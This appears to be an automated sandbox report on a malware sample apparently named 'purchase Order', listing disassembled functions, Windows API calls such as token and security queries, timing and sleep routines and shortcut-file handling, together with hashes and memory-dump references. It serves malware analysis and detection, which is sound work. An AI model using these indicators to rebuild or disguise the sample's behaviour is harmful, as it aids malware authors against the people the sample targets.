Opcode ID: e397994e1c93519714ad9aceeb3e78eb345cb3f27d26676597f9d4e79ee3d575
Instruction ID: ac7353cfe12f22354064a4f3da93533d97dbf6905c5006a3ad4209b74648f069
Opcode Fuzzy Hash: e397994e1c93519714ad9aceeb3e78eb345cb3f27d26676597f9d4e79ee3d575
Instruction Fuzzy Hash: E51108331087466FDB31AFA5DCC5D9F77A8EF417747100929FE2486151DB31C911A6A0

Function 00C7ABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00C7ABD7
GetLastError.KERNEL32(?,00C7A69F,?,?,?), ref: 00C7ABE1
GetProcessHeap.KERNEL32(00000008,?,?,00C7A69F,?,?,?), ref: 00C7ABF0
HeapAlloc.KERNEL32(00000000,?,00C7A69F,?,?,?), ref: 00C7ABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00C7AC0E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: e510879821943f68b0a04e388148569402db1ecdde90b0d86952d35cc0765eeb
Instruction ID: a66540ccafa66d6579bf9145c05233b5fcfed4ea5ecc3e0df8b9f777f808571a
Opcode Fuzzy Hash: e510879821943f68b0a04e388148569402db1ecdde90b0d86952d35cc0765eeb
Instruction Fuzzy Hash: BE011DB1200204BFDB114FA5DC48E6F3BADEF897957144429F55AC3260D671DD41DB61

Function 00C79ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 00C79ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 00C79AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 00C79B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00C79B15
CLSIDFromString.OLE32(?,?), ref: 00C79B21

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 0786ffbf28e63f6c2b1270c68a0920ad9137da6d9543dd3a704c22cd9bf4c2f1
Instruction ID: 1ab887f85fc47e39e9398e074def4fc1367fe160f65cf968f829a048517310bd
Opcode Fuzzy Hash: 0786ffbf28e63f6c2b1270c68a0920ad9137da6d9543dd3a704c22cd9bf4c2f1
Instruction Fuzzy Hash: 04012C76600215ABDB214F64ED44F9EBABDEB44791F148038F90AD2260D770DE409BA0

Function 00C87A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C87A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C87A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00C87A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 279074d8de3816e6834956fee04ebf8a7989df8d235a777352bf4b6038452ed4
Instruction ID: 2147d0ea86ebad6e145e0cbfb913c9626a9c2ffc5f68dfa21fb47ad80bfc7342
Opcode Fuzzy Hash: 279074d8de3816e6834956fee04ebf8a7989df8d235a777352bf4b6038452ed4
Instruction Fuzzy Hash: BE012932C04629EBCF04AFE5DC88BEDBB78FB08715F150595E502B2150EB309A9097A5

Function 00C7AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7AADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7AB10

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9f45d088174bf77ad2687ac85df0a4a170a6216de3142640e46908d4c6635d3d
Instruction ID: 03750f8fc7f926ba510f73c67358b8e5e8123b5ee921cc4f30947edda5713ec0
Opcode Fuzzy Hash: 9f45d088174bf77ad2687ac85df0a4a170a6216de3142640e46908d4c6635d3d
Instruction Fuzzy Hash: 2DF04F712012086FEB110FA5EC88F6F3B6DFF85794F044039F956C7190CA60D9029A61

Function 00C7AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C7AA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C7AA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C7AA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C7AA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C7AAAF

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 0586aa94fe128217d73e0ac0662e7d7ebd1131c4dd54d13d91b50264664bcd96
Instruction ID: 0bbffd13279c4138d9246284ed078eb85798fade54c010216815dfd5ee13e6dd
Opcode Fuzzy Hash: 0586aa94fe128217d73e0ac0662e7d7ebd1131c4dd54d13d91b50264664bcd96
Instruction Fuzzy Hash: F0F04F712002046FEB115FA5EC89F6F3BACFF89764F044429F956C71A0DA60DC42DB61

Function 00C7EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00C7EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 00C7ECAB
MessageBeep.USER32(00000000), ref: 00C7ECC3
KillTimer.USER32(?,0000040A), ref: 00C7ECDF
EndDialog.USER32(?,00000001), ref: 00C7ECF9

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 2d5b27ea89be08c33bbb62319bce0606ede8c6a78c9a3225074e9992c150041a
Instruction ID: dd2b1add64d6868cbfe8b34436254fce65b2b2ab031168e969da670e57384354
Opcode Fuzzy Hash: 2d5b27ea89be08c33bbb62319bce0606ede8c6a78c9a3225074e9992c150041a
Instruction Fuzzy Hash: 6C018175500704ABEB255F10DE4EF9A77B8FB04705F0045A9F697A14E0DBF0AA94CB45

Function 00C5B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00C5B0BA
StrokeAndFillPath.GDI32(?,?,00CBE680,00000000,?,?,?), ref: 00C5B0D6
SelectObject.GDI32(?,00000000), ref: 00C5B0E9
DeleteObject.GDI32 ref: 00C5B0FC
StrokePath.GDI32(?), ref: 00C5B117

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e9cd3906ac8b376bbe21654bd56d87b031933fb16499fa2c6065b6688968cf0c
Instruction ID: 2738d2b68a367e9b0efea8c787a1d2ae56c6f7d754f8b58a33f6e02db5eb3973
Opcode Fuzzy Hash: e9cd3906ac8b376bbe21654bd56d87b031933fb16499fa2c6065b6688968cf0c
Instruction Fuzzy Hash: 80F0B678400644AFDB219F69EC09B593FA5B710362F488325F82A851F0C772899ADF64

Function 00C8F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00C8F2DA
CoCreateInstance.OLE32(00CCDA7C,00000000,00000001,00CCD8EC,?), ref: 00C8F2F2
CoUninitialize.OLE32 ref: 00C8F555

Strings

.lnk, xrefs: 00C8F28B, 00C8F290, 00C8F29E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 7d71295096d344ee15a5a6c3623dc1f7e4f3d049166066422a7f816fc4e86931
Instruction ID: d26872d3e701cf21b53d0c6e1824614585954d4ae31807006a7def133e7fe594
Opcode Fuzzy Hash: 7d71295096d344ee15a5a6c3623dc1f7e4f3d049166066422a7f816fc4e86931
Instruction Fuzzy Hash: 00A13C75104201AFD300EF64C881EAFB7E8FF99315F00492DF556971A2DB70EA49DB92

Function 00C8E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C453B1,?,?,00C461FF,?,00000000,00000001,00000000), ref: 00C4662F

CoInitialize.OLE32(00000000), ref: 00C8E85D
CoCreateInstance.OLE32(00CCDA7C,00000000,00000001,00CCD8EC,?), ref: 00C8E876
CoUninitialize.OLE32 ref: 00C8E893

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

Strings

.lnk, xrefs: 00C8E83B, 00C8E84D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 754e3c089938570471d2b6543c09b814b04abe161bb9f0bdc3f7331de4b02aba
Instruction ID: bc408919506a4aaad8e186ee4d669461d86ec0abf4306e57fb0d86c648a87b0a
Opcode Fuzzy Hash: 754e3c089938570471d2b6543c09b814b04abe161bb9f0bdc3f7331de4b02aba
Instruction Fuzzy Hash: 83A122356043019FCB14EF14C484A6EBBE5FF89724F048998F9A69B3A2CB31ED45CB91

Function 00C6325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00C632ED

Part of subcall function 00C6E0D0: __87except.LIBCMT ref: 00C6E10B

Strings

pow, xrefs: 00C632C5, 00C632E2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 6e61f0fbfba5b0e0e8456bdd6b896ebf0b7ef663a0e550e3857a31001d3641fd
Instruction ID: c584d0137a9341435cfb036cddc101c27b2e89ddca54f6b02742252358f91e84
Opcode Fuzzy Hash: 6e61f0fbfba5b0e0e8456bdd6b896ebf0b7ef663a0e550e3857a31001d3641fd
Instruction Fuzzy Hash: 32515A75A0924196CB316714CDE137E6BD4DB41710F248D2AF4E6822FAEF388F85E646

Function 00C84606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00CDDC50,?,0000000F,0000000C,00000016,00CDDC50,?), ref: 00C84645

Part of subcall function 00C4936C: __swprintf.LIBCMT ref: 00C493AB
Part of subcall function 00C4936C: __itow.LIBCMT ref: 00C493DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 00C846C5

Strings

THIS, xrefs: 00C84703
REMOVE, xrefs: 00C84676

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: bcc88f1fc6a7aca3c3cec056e8bc2d8a863eb8e261838cdc54aa4d915ae50f02
Instruction ID: 6ee51d247edb01e2fdc8aade274c38f82682508a8b891a0813a459cdb302a045
Opcode Fuzzy Hash: bcc88f1fc6a7aca3c3cec056e8bc2d8a863eb8e261838cdc54aa4d915ae50f02
Instruction Fuzzy Hash: 29418274A0021A9FCF04EF64C881AAEB7B5FF49308F148069F916AB2A2DB34DD45DB54

Function 00CAA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CDDC00,00000000,?,?,?,?), ref: 00CAA6D8
GetWindowLongW.USER32 ref: 00CAA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CAA705

Strings

SysTreeView32, xrefs: 00CAA6AA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: c59b671ccb780d221e8a69e302f5146a9506dede2ee75b6d304a0ee37c3a8807
Instruction ID: b9992082c80352ce905af54160a30fbf6c53f3ba2ad5b86ec9b5a495b6125531
Opcode Fuzzy Hash: c59b671ccb780d221e8a69e302f5146a9506dede2ee75b6d304a0ee37c3a8807
Instruction Fuzzy Hash: 81318E35100606AFDB158E34CC45BEB7BA9EB4A328F244725F975D32E0C770AD50DB55

Function 00CAA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CAA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CAA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 00CAA196

Strings

SysMonthCal32, xrefs: 00CAA129

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: c6af6d5cb6cf1134e71d172c2d4705f5c2a7136122a7e95d2fa9225c3e1b1e49
Instruction ID: e1ad60e923255c6685fc2bc86c8b74c830d7d21d692280a0c233c9e8f260499b
Opcode Fuzzy Hash: c6af6d5cb6cf1134e71d172c2d4705f5c2a7136122a7e95d2fa9225c3e1b1e49
Instruction Fuzzy Hash: 8C21AD32500219BBDF158F94CC42FEE3B79EF49718F110214FA56AB190D7B5A850DBA0

Function 00CAA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CAA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CAA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CAA956

Strings

msctls_updown32, xrefs: 00CAA8BB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: fb441532c41962458a2628e3f9acd270cab946bbe8770cd52dd7056ec806738f
Instruction ID: 80379fe96a532e84d021dfb2c9c6df75ab966e884c5f77845d3f452978bac678
Opcode Fuzzy Hash: fb441532c41962458a2628e3f9acd270cab946bbe8770cd52dd7056ec806738f
Instruction Fuzzy Hash: E621B2B520020AAFEB10DF24CC81E7737ACEF4A368B450059FA15973A1CB31EC11DB61

Function 00CA99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA9A65

Strings

Listbox, xrefs: 00CA99FD

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 49b1d2ba6603705620197cc53196afa83e5eb19500950d532671dd4e09b708b2
Instruction ID: 58f9f9a1722ed1710ec22899d8a1b63e9d6d061531d81b833965cf59abf5863e
Opcode Fuzzy Hash: 49b1d2ba6603705620197cc53196afa83e5eb19500950d532671dd4e09b708b2
Instruction Fuzzy Hash: 7F21C532610119BFDB218F54CC86FBF3BBAEF8A764F018129F959971A0C6719C51D7A0

Function 00C7B5B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C7B5D2
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00C7B5E9
SendMessageW.USER32(?,0000000D,?,00000000), ref: 00C7B621

Strings

@U=u, xrefs: 00C7B621

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend
String ID: @U=u
API String ID: 3850602802-2594219639
Opcode ID: 771613262b7b2d5cd613e360c1d01ec761606dab8ec8451d099057ca23e51fe4
Instruction ID: a54460e6f4a72edcb23915859daa7d7d813bb3c7f3c96d3e0cd0fa3c35d44db6
Opcode Fuzzy Hash: 771613262b7b2d5cd613e360c1d01ec761606dab8ec8451d099057ca23e51fe4
Instruction Fuzzy Hash: B0218E72600108BFDF14DFA8C942AAEB7BDFF44340F11446AF609E3190DB71BE569AA4

Function 00C987A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000402,00000000,00000000), ref: 00C987F3
SendMessageW.USER32(0000000C,00000000,?), ref: 00C98834
SendMessageW.USER32(0000000C,00000000,?), ref: 00C9885C

Strings

@U=u, xrefs: 00C987F3, 00C98834, 00C9885C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

